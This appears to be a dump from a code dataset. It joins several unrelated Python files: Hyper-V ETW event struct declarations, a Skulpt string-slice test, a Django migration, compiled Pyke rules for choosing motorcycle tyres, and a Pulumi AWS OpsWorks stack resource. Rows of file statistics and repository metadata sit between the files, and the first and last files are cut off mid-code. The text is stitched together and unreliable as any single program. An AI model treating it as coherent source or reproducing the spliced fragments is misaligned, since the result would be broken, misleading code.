"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=265, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_265_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=266, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_266_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=267, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_267_0(Etw):
pattern = Struct(
"IoctlCode" / Int32ul,
"ElapsedTime" / Int64ul,
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=268, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_268_0(Etw):
pattern = Struct(
"ConnectivityState" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=269, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_269_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=270, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_270_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=275, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_275_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=276, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_276_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
| 36.268573
| 123
| 0.655327
| 13,569
| 135,717
| 6.415285
| 0.043703
| 0.088961
| 0.121311
| 0.153661
| 0.945238
| 0.944698
| 0.940195
| 0.940195
| 0.806396
| 0.806396
| 0
| 0.100138
| 0.219597
| 135,717
| 3,741
| 124
| 36.278268
| 0.721746
| 0.000744
| 0
| 0.703599
| 0
| 0
| 0.240024
| 0.082142
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001252
| 0
| 0.170266
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4671d2ff32c950a2bd16767249973665ffcc7da7
| 19
|
py
|
Python
|
test/run/t32.py
|
timmartin/skulpt
|
2e3a3fbbaccc12baa29094a717ceec491a8a6750
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
test/run/t32.py
|
csev/skulpt
|
9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
test/run/t32.py
|
csev/skulpt
|
9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
print "1234"[-3:3]
| 9.5
| 18
| 0.578947
| 4
| 19
| 2.75
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.352941
| 0.105263
| 19
| 1
| 19
| 19
| 0.294118
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
d3be5d6b837c2a0c081f3148cd7bf9622937d1b8
| 1,360
|
py
|
Python
|
bakerydemo/base/migrations/0006_char_field_remove_null.py
|
l-etabli/bakerydemo
|
0a03c00eaf6ce70842f92d1f508da6337f9be523
|
[
"BSD-3-Clause"
] | null | null | null |
bakerydemo/base/migrations/0006_char_field_remove_null.py
|
l-etabli/bakerydemo
|
0a03c00eaf6ce70842f92d1f508da6337f9be523
|
[
"BSD-3-Clause"
] | null | null | null |
bakerydemo/base/migrations/0006_char_field_remove_null.py
|
l-etabli/bakerydemo
|
0a03c00eaf6ce70842f92d1f508da6337f9be523
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 3.2.10 on 2021-12-26 06:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('base', '0005_formfield_clean_name'),
]
operations = [
migrations.AlterField(
model_name='homepage',
name='featured_section_1_title',
field=models.CharField(blank=True, default='', help_text='Title to display above the promo copy', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='homepage',
name='featured_section_2_title',
field=models.CharField(blank=True, default='', help_text='Title to display above the promo copy', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='homepage',
name='featured_section_3_title',
field=models.CharField(blank=True, default='', help_text='Title to display above the promo copy', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='homepage',
name='promo_title',
field=models.CharField(blank=True, default='', help_text='Title to display above the promo copy', max_length=255),
preserve_default=False,
),
]
| 35.789474
| 126
| 0.620588
| 151
| 1,360
| 5.397351
| 0.337748
| 0.09816
| 0.122699
| 0.142331
| 0.806135
| 0.806135
| 0.806135
| 0.806135
| 0.737423
| 0.737423
| 0
| 0.035354
| 0.272059
| 1,360
| 37
| 127
| 36.756757
| 0.787879
| 0.033824
| 0
| 0.645161
| 1
| 0
| 0.222561
| 0.073933
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.032258
| 0
| 0.129032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
317aa96cacf8abc568acb2768b940f4263473e37
| 10,406
|
py
|
Python
|
Proyecto/ai/compiled_krb/bc_moto_rules_questions_bc.py
|
leynier/IA-Sim-Com
|
f6e99bb1aa4b02d5d558dc76a9bf802c3761e428
|
[
"MIT"
] | null | null | null |
Proyecto/ai/compiled_krb/bc_moto_rules_questions_bc.py
|
leynier/IA-Sim-Com
|
f6e99bb1aa4b02d5d558dc76a9bf802c3761e428
|
[
"MIT"
] | 1
|
2022-02-11T07:26:54.000Z
|
2022-02-11T07:26:54.000Z
|
Proyecto/ai/compiled_krb/bc_moto_rules_questions_bc.py
|
leynier/IA-Sim-Com
|
f6e99bb1aa4b02d5d558dc76a9bf802c3761e428
|
[
"MIT"
] | null | null | null |
# bc_moto_rules_questions_bc.py
from pyke import contexts, pattern, bc_rule
pyke_version = '1.1.1'
compiler_version = 1
def rain_1(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'rainy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.rain_1: got unexpected plan from when clause 1"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def rain_2(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'rainy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.rain_2: got unexpected plan from when clause 1"
with engine.prove('moto_questions', 'humidity', context,
(rule.pattern(1),)) \
as gen_2:
for x_2 in gen_2:
assert x_2 is None, \
"bc_moto_rules_questions.rain_2: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def slick(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'rainy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.slick: got unexpected plan from when clause 1"
with engine.prove('moto_questions', 'humidity', context,
(rule.pattern(0),)) \
as gen_2:
for x_2 in gen_2:
assert x_2 is None, \
"bc_moto_rules_questions.slick: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def soft(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'windy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.soft: got unexpected plan from when clause 1"
with engine.prove('moto_questions', 'wind_direction', context,
(rule.pattern(1),)) \
as gen_2:
for x_2 in gen_2:
assert x_2 is None, \
"bc_moto_rules_questions.soft: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def medium_1(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'windy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.medium_1: got unexpected plan from when clause 1"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def medium_2(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'windy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.medium_2: got unexpected plan from when clause 1"
with engine.prove('moto_questions', 'wind_direction', context,
(rule.pattern(1),)) \
as gen_2:
for x_2 in gen_2:
assert x_2 is None, \
"bc_moto_rules_questions.medium_2: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def hard(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(map(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
with engine.prove('moto_questions', 'windy', context,
(rule.pattern(0),)) \
as gen_1:
for x_1 in gen_1:
assert x_1 is None, \
"bc_moto_rules_questions.hard: got unexpected plan from when clause 1"
with engine.prove('moto_questions', 'wind_direction', context,
(rule.pattern(1),)) \
as gen_2:
for x_2 in gen_2:
assert x_2 is None, \
"bc_moto_rules_questions.hard: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
def populate(engine):
This_rule_base = engine.get_create('bc_moto_rules_questions')
bc_rule.bc_rule('rain_1', This_rule_base, 'select_type',
rain_1, None,
(pattern.pattern_literal('Rain'),),
(),
(pattern.pattern_literal(True),))
bc_rule.bc_rule('rain_2', This_rule_base, 'select_type',
rain_2, None,
(pattern.pattern_literal('Rain'),),
(),
(pattern.pattern_literal(False),
pattern.pattern_literal(True),))
bc_rule.bc_rule('slick', This_rule_base, 'select_type',
slick, None,
(pattern.pattern_literal('Rain'),),
(),
(pattern.pattern_literal(False),))
bc_rule.bc_rule('soft', This_rule_base, 'select_tires',
soft, None,
(pattern.pattern_literal('Soft'),),
(),
(pattern.pattern_literal(True),
pattern.pattern_literal(3),))
bc_rule.bc_rule('medium_1', This_rule_base, 'select_tires',
medium_1, None,
(pattern.pattern_literal('Slick_Medium'),),
(),
(pattern.pattern_literal(False),))
bc_rule.bc_rule('medium_2', This_rule_base, 'select_tires',
medium_2, None,
(pattern.pattern_literal('Slick_Medium'),),
(),
(pattern.pattern_literal(True),
pattern.pattern_literal(2),))
bc_rule.bc_rule('hard', This_rule_base, 'select_tires',
hard, None,
(pattern.pattern_literal('Hard'),),
(),
(pattern.pattern_literal(True),
pattern.pattern_literal(1),))
Krb_filename = '..\\bc_moto_rules_questions.krb'
Krb_lineno_map = (
((14, 18), (5, 5)),
((20, 25), (7, 7)),
((38, 42), (11, 11)),
((44, 49), (13, 13)),
((50, 55), (14, 14)),
((68, 72), (18, 18)),
((74, 79), (20, 20)),
((80, 85), (21, 21)),
((98, 102), (25, 25)),
((104, 109), (27, 27)),
((110, 115), (28, 28)),
((128, 132), (32, 32)),
((134, 139), (34, 34)),
((152, 156), (38, 38)),
((158, 163), (40, 40)),
((164, 169), (41, 41)),
((182, 186), (45, 45)),
((188, 193), (47, 47)),
((194, 199), (48, 48)),
)
| 37.431655
| 92
| 0.536998
| 1,249
| 10,406
| 4.197758
| 0.103283
| 0.05493
| 0.064085
| 0.06008
| 0.914934
| 0.884036
| 0.862865
| 0.840549
| 0.815373
| 0.772649
| 0
| 0.042715
| 0.354315
| 10,406
| 277
| 93
| 37.566787
| 0.73761
| 0.002787
| 0
| 0.735409
| 0
| 0
| 0.127422
| 0.040675
| 0
| 0
| 0
| 0
| 0.046693
| 1
| 0.031128
| false
| 0
| 0.003891
| 0
| 0.035019
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
31a35d016a45ce93f1ae9ea8eceb599a44c1dbf0
| 17,542
|
py
|
Python
|
sdk/python/pulumi_aws/opsworks/stack.py
|
johnktims/pulumi-aws
|
c838bc79043f5376c66fc66275a1e012edd3ab7d
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/opsworks/stack.py
|
johnktims/pulumi-aws
|
c838bc79043f5376c66fc66275a1e012edd3ab7d
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/opsworks/stack.py
|
johnktims/pulumi-aws
|
c838bc79043f5376c66fc66275a1e012edd3ab7d
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Stack(pulumi.CustomResource):
agent_version: pulumi.Output[str]
"""
If set to `"LATEST"`, OpsWorks will automatically install the latest version.
"""
arn: pulumi.Output[str]
berkshelf_version: pulumi.Output[str]
"""
If `manage_berkshelf` is enabled, the version of Berkshelf to use.
"""
color: pulumi.Output[str]
"""
Color to paint next to the stack's resources in the OpsWorks console.
"""
configuration_manager_name: pulumi.Output[str]
"""
Name of the configuration manager to use. Defaults to "Chef".
"""
configuration_manager_version: pulumi.Output[str]
"""
Version of the configuration manager to use. Defaults to "11.4".
"""
custom_cookbooks_sources: pulumi.Output[list]
"""
When `use_custom_cookbooks` is set, provide this sub-object as
described below.
* `password` (`str`) - Password to use when authenticating to the source. The provider cannot perform drift detection of this configuration.
* `revision` (`str`) - For sources that are version-aware, the revision to use.
* `sshKey` (`str`) - SSH key to use when authenticating to the source. The provider cannot perform drift detection of this configuration.
* `type` (`str`) - The type of source to use. For example, "archive".
* `url` (`str`) - The URL where the cookbooks resource can be found.
* `username` (`str`) - Username to use when authenticating to the source.
"""
custom_json: pulumi.Output[str]
"""
Custom JSON attributes to apply to the entire stack.
"""
default_availability_zone: pulumi.Output[str]
"""
Name of the availability zone where instances will be created
by default. This is required unless you set `vpc_id`.
"""
default_instance_profile_arn: pulumi.Output[str]
"""
The ARN of an IAM Instance Profile that created instances
will have by default.
"""
default_os: pulumi.Output[str]
"""
Name of OS that will be installed on instances by default.
"""
default_root_device_type: pulumi.Output[str]
"""
Name of the type of root device instances will have by default.
"""
default_ssh_key_name: pulumi.Output[str]
"""
Name of the SSH keypair that instances will have by default.
"""
default_subnet_id: pulumi.Output[str]
"""
Id of the subnet in which instances will be created by default. Mandatory
if `vpc_id` is set, and forbidden if it isn't.
"""
hostname_theme: pulumi.Output[str]
"""
Keyword representing the naming scheme that will be used for instance hostnames
within this stack.
"""
manage_berkshelf: pulumi.Output[bool]
"""
Boolean value controlling whether Opsworks will run Berkshelf for this stack.
"""
name: pulumi.Output[str]
"""
The name of the stack.
"""
region: pulumi.Output[str]
"""
The name of the region where the stack will exist.
"""
service_role_arn: pulumi.Output[str]
"""
The ARN of an IAM role that the OpsWorks service will act as.
"""
stack_endpoint: pulumi.Output[str]
tags: pulumi.Output[dict]
"""
A mapping of tags to assign to the resource.
"""
use_custom_cookbooks: pulumi.Output[bool]
"""
Boolean value controlling whether the custom cookbook settings are
enabled.
"""
use_opsworks_security_groups: pulumi.Output[bool]
"""
Boolean value controlling whether the standard OpsWorks
security groups apply to created instances.
"""
vpc_id: pulumi.Output[str]
"""
The id of the VPC that this stack belongs to.
"""
def __init__(__self__, resource_name, opts=None, agent_version=None, berkshelf_version=None, color=None, configuration_manager_name=None, configuration_manager_version=None, custom_cookbooks_sources=None, custom_json=None, default_availability_zone=None, default_instance_profile_arn=None, default_os=None, default_root_device_type=None, default_ssh_key_name=None, default_subnet_id=None, hostname_theme=None, manage_berkshelf=None, name=None, region=None, service_role_arn=None, tags=None, use_custom_cookbooks=None, use_opsworks_security_groups=None, vpc_id=None, __props__=None, __name__=None, __opts__=None):
"""
Provides an OpsWorks stack resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] agent_version: If set to `"LATEST"`, OpsWorks will automatically install the latest version.
:param pulumi.Input[str] berkshelf_version: If `manage_berkshelf` is enabled, the version of Berkshelf to use.
:param pulumi.Input[str] color: Color to paint next to the stack's resources in the OpsWorks console.
:param pulumi.Input[str] configuration_manager_name: Name of the configuration manager to use. Defaults to "Chef".
:param pulumi.Input[str] configuration_manager_version: Version of the configuration manager to use. Defaults to "11.4".
:param pulumi.Input[list] custom_cookbooks_sources: When `use_custom_cookbooks` is set, provide this sub-object as
described below.
:param pulumi.Input[str] custom_json: Custom JSON attributes to apply to the entire stack.
:param pulumi.Input[str] default_availability_zone: Name of the availability zone where instances will be created
by default. This is required unless you set `vpc_id`.
:param pulumi.Input[str] default_instance_profile_arn: The ARN of an IAM Instance Profile that created instances
will have by default.
:param pulumi.Input[str] default_os: Name of OS that will be installed on instances by default.
:param pulumi.Input[str] default_root_device_type: Name of the type of root device instances will have by default.
:param pulumi.Input[str] default_ssh_key_name: Name of the SSH keypair that instances will have by default.
:param pulumi.Input[str] default_subnet_id: Id of the subnet in which instances will be created by default. Mandatory
if `vpc_id` is set, and forbidden if it isn't.
:param pulumi.Input[str] hostname_theme: Keyword representing the naming scheme that will be used for instance hostnames
within this stack.
:param pulumi.Input[bool] manage_berkshelf: Boolean value controlling whether Opsworks will run Berkshelf for this stack.
:param pulumi.Input[str] name: The name of the stack.
:param pulumi.Input[str] region: The name of the region where the stack will exist.
:param pulumi.Input[str] service_role_arn: The ARN of an IAM role that the OpsWorks service will act as.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[bool] use_custom_cookbooks: Boolean value controlling whether the custom cookbook settings are
enabled.
:param pulumi.Input[bool] use_opsworks_security_groups: Boolean value controlling whether the standard OpsWorks
security groups apply to created instances.
:param pulumi.Input[str] vpc_id: The id of the VPC that this stack belongs to.
The **custom_cookbooks_sources** object supports the following:
* `password` (`pulumi.Input[str]`) - Password to use when authenticating to the source. The provider cannot perform drift detection of this configuration.
* `revision` (`pulumi.Input[str]`) - For sources that are version-aware, the revision to use.
* `sshKey` (`pulumi.Input[str]`) - SSH key to use when authenticating to the source. The provider cannot perform drift detection of this configuration.
* `type` (`pulumi.Input[str]`) - The type of source to use. For example, "archive".
* `url` (`pulumi.Input[str]`) - The URL where the cookbooks resource can be found.
* `username` (`pulumi.Input[str]`) - Username to use when authenticating to the source.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['agent_version'] = agent_version
__props__['berkshelf_version'] = berkshelf_version
__props__['color'] = color
__props__['configuration_manager_name'] = configuration_manager_name
__props__['configuration_manager_version'] = configuration_manager_version
__props__['custom_cookbooks_sources'] = custom_cookbooks_sources
__props__['custom_json'] = custom_json
__props__['default_availability_zone'] = default_availability_zone
if default_instance_profile_arn is None:
raise TypeError("Missing required property 'default_instance_profile_arn'")
__props__['default_instance_profile_arn'] = default_instance_profile_arn
__props__['default_os'] = default_os
__props__['default_root_device_type'] = default_root_device_type
__props__['default_ssh_key_name'] = default_ssh_key_name
__props__['default_subnet_id'] = default_subnet_id
__props__['hostname_theme'] = hostname_theme
__props__['manage_berkshelf'] = manage_berkshelf
__props__['name'] = name
if region is None:
raise TypeError("Missing required property 'region'")
__props__['region'] = region
if service_role_arn is None:
raise TypeError("Missing required property 'service_role_arn'")
__props__['service_role_arn'] = service_role_arn
__props__['tags'] = tags
__props__['use_custom_cookbooks'] = use_custom_cookbooks
__props__['use_opsworks_security_groups'] = use_opsworks_security_groups
__props__['vpc_id'] = vpc_id
__props__['arn'] = None
__props__['stack_endpoint'] = None
super(Stack, __self__).__init__(
'aws:opsworks/stack:Stack',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, agent_version=None, arn=None, berkshelf_version=None, color=None, configuration_manager_name=None, configuration_manager_version=None, custom_cookbooks_sources=None, custom_json=None, default_availability_zone=None, default_instance_profile_arn=None, default_os=None, default_root_device_type=None, default_ssh_key_name=None, default_subnet_id=None, hostname_theme=None, manage_berkshelf=None, name=None, region=None, service_role_arn=None, stack_endpoint=None, tags=None, use_custom_cookbooks=None, use_opsworks_security_groups=None, vpc_id=None):
"""
Get an existing Stack resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] agent_version: If set to `"LATEST"`, OpsWorks will automatically install the latest version.
:param pulumi.Input[str] berkshelf_version: If `manage_berkshelf` is enabled, the version of Berkshelf to use.
:param pulumi.Input[str] color: Color to paint next to the stack's resources in the OpsWorks console.
:param pulumi.Input[str] configuration_manager_name: Name of the configuration manager to use. Defaults to "Chef".
:param pulumi.Input[str] configuration_manager_version: Version of the configuration manager to use. Defaults to "11.4".
:param pulumi.Input[list] custom_cookbooks_sources: When `use_custom_cookbooks` is set, provide this sub-object as
described below.
:param pulumi.Input[str] custom_json: Custom JSON attributes to apply to the entire stack.
:param pulumi.Input[str] default_availability_zone: Name of the availability zone where instances will be created
by default. This is required unless you set `vpc_id`.
:param pulumi.Input[str] default_instance_profile_arn: The ARN of an IAM Instance Profile that created instances
will have by default.
:param pulumi.Input[str] default_os: Name of OS that will be installed on instances by default.
:param pulumi.Input[str] default_root_device_type: Name of the type of root device instances will have by default.
:param pulumi.Input[str] default_ssh_key_name: Name of the SSH keypair that instances will have by default.
:param pulumi.Input[str] default_subnet_id: Id of the subnet in which instances will be created by default. Mandatory
if `vpc_id` is set, and forbidden if it isn't.
:param pulumi.Input[str] hostname_theme: Keyword representing the naming scheme that will be used for instance hostnames
within this stack.
:param pulumi.Input[bool] manage_berkshelf: Boolean value controlling whether Opsworks will run Berkshelf for this stack.
:param pulumi.Input[str] name: The name of the stack.
:param pulumi.Input[str] region: The name of the region where the stack will exist.
:param pulumi.Input[str] service_role_arn: The ARN of an IAM role that the OpsWorks service will act as.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[bool] use_custom_cookbooks: Boolean value controlling whether the custom cookbook settings are
enabled.
:param pulumi.Input[bool] use_opsworks_security_groups: Boolean value controlling whether the standard OpsWorks
security groups apply to created instances.
:param pulumi.Input[str] vpc_id: The id of the VPC that this stack belongs to.
The **custom_cookbooks_sources** object supports the following:
* `password` (`pulumi.Input[str]`) - Password to use when authenticating to the source. The provider cannot perform drift detection of this configuration.
* `revision` (`pulumi.Input[str]`) - For sources that are version-aware, the revision to use.
* `sshKey` (`pulumi.Input[str]`) - SSH key to use when authenticating to the source. The provider cannot perform drift detection of this configuration.
* `type` (`pulumi.Input[str]`) - The type of source to use. For example, "archive".
* `url` (`pulumi.Input[str]`) - The URL where the cookbooks resource can be found.
* `username` (`pulumi.Input[str]`) - Username to use when authenticating to the source.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["agent_version"] = agent_version
__props__["arn"] = arn
__props__["berkshelf_version"] = berkshelf_version
__props__["color"] = color
__props__["configuration_manager_name"] = configuration_manager_name
__props__["configuration_manager_version"] = configuration_manager_version
__props__["custom_cookbooks_sources"] = custom_cookbooks_sources
__props__["custom_json"] = custom_json
__props__["default_availability_zone"] = default_availability_zone
__props__["default_instance_profile_arn"] = default_instance_profile_arn
__props__["default_os"] = default_os
__props__["default_root_device_type"] = default_root_device_type
__props__["default_ssh_key_name"] = default_ssh_key_name
__props__["default_subnet_id"] = default_subnet_id
__props__["hostname_theme"] = hostname_theme
__props__["manage_berkshelf"] = manage_berkshelf
__props__["name"] = name
__props__["region"] = region
__props__["service_role_arn"] = service_role_arn
